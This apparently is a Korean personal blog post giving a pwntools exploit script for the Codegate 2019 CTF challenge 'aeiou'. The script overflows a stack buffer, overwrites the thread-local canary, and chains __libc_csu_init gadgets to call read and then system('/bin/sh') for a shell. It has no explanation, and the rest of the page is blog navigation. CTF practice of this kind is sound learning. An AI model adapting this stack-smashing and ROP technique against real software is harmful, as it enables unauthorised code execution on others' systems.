Codegate 2019 CTF aeiou

System/Pwnable Practice 2019. 7. 30. 02:08

exploit.py

from pwn import *
  
p = process("./aeiou")

e = ELF("./aeiou")
l = e.libc


def csu_chain(addr,argv1,argv2,argv3,mode=1):
    payload = ""
    if mode!=0:
        payload += "A"*8
    payload += p64(0) 
    payload += p64(1) 
    payload += p64(addr) 
    payload += p64(argv3) 
    payload += p64(argv2) 
    payload += p64(argv1)
    payload += p64(csu_2)

    return payload

binsh = "/bin/sh\x00"
csu_1 = 0x4026EA
csu_2 = 0x4026D0
ret = 0x400b29

payload = "A"*0x1018
payload += p64(ret)
payload += p64(csu_1)
payload += csu_chain(e.got['read'],0,e.bss(),len(binsh),0)
payload += csu_chain(e.got['system'],e.bss(),0,0)
canary = "A"*(6224-len(payload))
payload += canary

p.sendlineafter(">>","3")
p.sendlineafter("number!\n",str(len(payload)))
p.sendline(payload)
p.sendline(binsh)
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

Harekaze CTF 2019 Baby ROP 1,2 (0)	2019.08.01
Hitcon CTF 2017 start (0)	2019.07.30
Codegate 2016 CTF Watermelon (0)	2019.07.29
Defcon CTF 2016 Feed me (0)	2019.07.29
SECCON CTF 2018 Classic (0)	2019.07.28

JeonYoungSin

메모 기록용 공간

일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

Codegate 2019 CTF aeiou

'System > Pwnable Practice' 카테고리의 다른 글

공지사항

카테고리

태그목록

글 보관함

달력

링크

JeonYoungSin

LATEST FROM OUR BLOG

LATEST COMMENTS

BLOG VISITORS

티스토리툴바